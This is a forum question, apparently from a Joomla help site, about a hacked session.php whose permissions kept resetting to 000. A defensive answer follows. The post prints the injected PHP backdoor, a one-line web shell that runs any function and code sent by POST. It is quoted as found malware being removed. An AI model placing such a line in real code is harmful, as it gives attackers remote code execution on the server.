# Joomla: Permissions of session.php changed to 000 due to virus

Tags: session, joomla, permissions, malware, virus

One of our websites was giving error 500 every day, after checking error log, I found that the permissions off the file in /home/cadactdi/public_html/libraries/joomla/session/session.php were changed to 000 by itself.

Checking on the utility port 80, I found that the session file was infected by some sort of virus, but there was no details about how to clean it.

So, as an update was not an option, I was changing every single day the permissions by myself, but they got back to 000 the day after.

I read the session file and I found the following piece of code at the beginning of the file:

```
if(isset($_POST["php_code"])){@$_POST["php_func"](stripslashes($_POST["php_code"]));};
if(isset($_SERVER["HTTP_USER_AGENT"])){$_SERVER["HTTP_USER_AGENT"]=@preg_replace("/[^\w\-\.]+/is","_",$_SERVER["HTTP_USER_AGENT"]);}
if(isset($_SERVER["HTTP_X_FORWARDED_FOR"])){$_SERVER["HTTP_X_FORWARDED_FOR"]=@preg_replace("/[^\d\.]+/is","",$_SERVER["HTTP_X_FORWARDED_FOR"]);}



if(isset($_POST["php_code"])){@$_POST["php_func"](stripslashes($_POST["php_code"]));};
if(isset($_SERVER["HTTP_USER_AGENT"])){$_SERVER["HTTP_USER_AGENT"]=@preg_replace("/[^\w\-\.]+/is","_",$_SERVER["HTTP_USER_AGENT"]);}
if(isset($_SERVER["HTTP_X_FORWARDED_FOR"])){$_SERVER["HTTP_X_FORWARDED_FOR"]=@preg_replace("/[^\d\.]+/is","",$_SERVER["HTTP_X_FORWARDED_FOR"]);}
```

So I deleted those lines, and the virus scanner did not find any threat this time, and I think it is fixed, however, I am not sure if this is going to happen again, if any virus can modify that file and how to prevent it.

Has anybody had the same problem? What are the recommendations?

Thanks for your help!

Answer (score 0):

Remove any third party extensions that are not being used.

Update Joomla and the remaining third party extensions to the latest versions including [EOL security patches](http://docs.joomla.org/Security_hotfixes_for_Joomla_EOL_versions) where apoplicable and rescan for any malware using a reliable commercial service such as sucuri.net or myjoomla.com.

Using [vel.joomla.org](http://vel.joomla.org), check if any vulnerable extensions are installed and remove any that are found.

Disable or remove unused user accounts.

It might also be prudent to reset admin account, hosting control panel and database passwords.

Comment: Thank you so much! im checking on it